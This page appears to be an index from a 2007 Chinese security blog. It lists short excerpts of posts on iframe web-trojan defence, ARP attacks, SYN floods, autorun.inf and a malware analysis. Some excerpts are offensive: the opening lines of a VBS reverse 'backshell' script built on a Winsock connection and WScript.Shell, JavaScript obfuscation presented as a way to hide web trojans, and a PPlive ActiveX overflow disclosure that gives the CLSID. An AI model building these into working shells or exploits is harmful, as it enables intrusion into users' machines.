技术文章第9页-夜火博客

2007年12月24日

TCP版backshell的VBS脚本

From:baicker'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷'by 009, baicker@hotmail.com'date:071221Dim revdataset sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )set sc=createobject( "WScript.Shell" )Set fso =CreateObject( "Scripting.FileSystemObject" )sock.connect "127.0.0.1" , 1234......................................

2007年12月22日

一行代码解决iframe挂马（服务器端注入、客户端ARP注入等）

一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）本文原创：linr@cncert.net 请转载时保留版权信息相信大多数朋友都是iframe木马的受害者，有朋友的网站被注入了N回iframe，心情可想而知。而且现在ARP攻击，注入iframe也是轻而易举的事，仅局域网里都时刻面临威胁，哎，什么世道。灵儿曾经在经典论坛上发过贴子：《一行代码解决网站防挂IFRAME木马方案》http://bbs.blueidea.com/thread-2785512-1-1.html ，有不少朋友都联系了灵儿，有的表示感谢，不过更多的是疑问了，今天把原理细细地讲一下吧：

2007年12月09日

你到底遭受了多大的SYN Flood攻击？

Team: http://www.ph4nt0m.org Author: 云舒（http://www.icylife.net） Date: 2007-12-07 这是一篇好玩的文章，它并不是讲SYN Flood的攻击原理的，也不描述防御攻击的解决方案。在这里，我会随便说说几个通常被设备厂商或无意，或有意隐藏的几个细节。如果你在考虑买防御攻击的设备，希望这个文章能够给你一些帮助——至少在和厂商谈判的时候，知道问哪些问题，不会轻易被人忽悠了。

2007年12月04日

JavaScript加密解密7种方法

本文一共介绍了七种javascript加密方法：　　在做网页时（其实是网页木马呵呵），最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的javascript代码常常被别人轻易的拷贝，实在让自己的心里有点不是滋味，要知道自己写点东西也挺累的......^*^　　但我们也应该清楚地认识到因为javascript代码是在IE中解释执行，要想绝对的保密是不可能的，我们要做的就是尽可能的增大拷贝者复制的难度，让他知难而退（但愿~!~），下面我结合自己这几年来的实践，及个人研究的心得，和大家一起来探讨一下网页中javascript代码的加密解密技术。

2007年12月03日

简单讲解网络安全与安全设置[zz]

转自。。。。。。。。（夜火：不知道写哪个了~见下~）

　文章转载请注名出处
作者　dxainx slinux redhatd 晚上小飞贼　
都是一个人～～

2007年11月27日

如何杜绝iframe挂马

来源:Secker's BLog因为FF(Firefox)不怕IFRAME，于是就拿IE开刀，不知道比尔有没有奖发。我只写了一句代码，就搞定了，哈，痛快。就是IE only（特有的）的CSS中的属性e-xpression，插进去试试，果然那些IFRAME不起作用了。代码如下：.............................

2007年11月25日

穿透还原的工作原理分析（逆向工程）--机器狗

本来是在龙组论坛上看到了这个名为机器狗的病毒，但是因为是江民的病毒报告，明显的公式化，所以并没多关注，但是刚刚在鬼仔的blog上看到了相关的分析，就转来了

鬼仔注：文章末尾所添加的机器狗、IGM、写穿还原的工具（已可以被卡巴检测到是病毒）是在无敌小龙那里看到的，我加了个备用地址。
样本脱壳
OD加载样本explorer.exe，。.......................

2007年11月18日

autorun.inf完全操作手册

夜火：总结的比较全，有用的几乎都写上了，对比以前收集的《病毒的Autorun.inf新写法与应用以及防御》和《彻底杜绝autorun.inf自动运行》对自己写写autorun.inf，或修改，杀毒等颇有帮助

笔者按：鉴于现在网上完全介绍autorun.inf功能的文章不多，笔者在微软官网的一个犄角旮旯找到了一篇autorun.inf的英文使用说明，在翻译和笔者的亲自试验下写出此篇文章。======我是分隔线======一、autorun.inf是windows下操纵光盘行为的一个文件，需要放在光盘根目录下，部分操作对于硬盘也适用。二、autorun.inf是可以被禁止的。方法如下：点击开始->运行，在文本框中输入regedit或者regedt32。依次展开

2007年11月15日

ARP概念及攻击与防护的原理

最近在论坛上经常看到关于ARP病毒的问题，于是在Google上搜索ARP关键字，结果出来很多关于这类问题的讨论。呵呵，俺的求知欲很强，想再学习ARP下相关知识，所以对目前网络中常见的ARP问题进行了一个总结。 1. ARP概念咱们谈ARP之前，还是先要知道ARP的概念和工作原理，理解了原理知识，才能更好去面对和分析处理问题。 1.1 ARP概念知识 ARP，全称Address Resolution Protocol，中文名为地址解析协议，它工作在数据链路层，在本层和硬件接口联系，同时对上层提供服务。

2007年11月14日

PPlive 0Day 网马曝光！

根据近期恶意网址检测的结果，发现有一部分网马利用最新的PPlive 0Day漏洞在传播，虽然目前数目还不多，但是相信很快就会成为网马的主力军，并与迅雷、百度搜霸、暴风影音、PPS等一路，加入今年应用软件网页木马的大潮中。该漏洞是由Bug Center Team（http://www.cnbct.org/index.php) 小组的Maple-x发现的，影响版本:为 pplive 1.8beat2 ，有问题的dll: MngModule.dll 1.7.0.2 ，在该模块中，有一个vsprintf的函数，程序只分配了400h(1024个字节)的大小，中间并没有进行过长度判断，当提交超过1024个A以后就会发生溢出了。因此可以基本判断为是由于vsprintf的字符串长度过长，从而导致的溢出。由此可见，在编写程序时，做好边界检查是多么的重要！该有漏洞溢出模块的CLSID:9F0F8700-A4D8-4E24-A3E0-1CA654CB5179另附上Exploit：

2007年11月13日

Windows下20个省力的特殊的执行命令[zz]

1. systeminfo：让XP列出更多有用信息 Windows XP 总是在炫耀它可以给稳定工作多么长的时间！要想详细地了解这一信息，你可以接入 Windows的“开始菜单”，再开启“附件菜单”中的“命令提示符”，然后在其中输入“systeminfo”这个命令。电脑就会给你显示出许多有用信息，其中包括了这个系统的初次安装时间，以及本次持续运行的时间。假如你想要保留这些信息，你可以输入“systeminfo >info.txt”，这将会创建一个名为“info.txt”文本文件，你可以稍后用Windows的记事本将其打开，进行查看。（仅限于Windows XP 专业版本） 2.gpedit.msc：设置直接删除文件................................

2007年11月06日

高级恶意软件技术新挑战——突破主动防御

文章作者：xyzreg
作者网站：http://www.xyzreg.net
信息来源：邪恶八进制信息安全团队（forum.eviloctal.com）

这是今年我在XCON2007（安全焦点信息安全技术峰会）所演讲的议题，现在提供ppt资料下载
议题介绍:

主动防御技术已被杀毒软件、软件防火墙、HIPS等安全软件广泛采用，现有的后门木马、Rootkit等恶意软件面临严峻考验。无论传统的恶意软件功能有多强大隐蔽性有多高，初次安装以及工作时都会被主动防御功能拦截并提示用户，使其无法正常安装和工作。本议题阐述了主动防御技术的应用现状和原理，并深入 Windows系统内核详细讲解突破主动防御的各种方法和思路。

下载地址： xcon2007_xyzreg.rar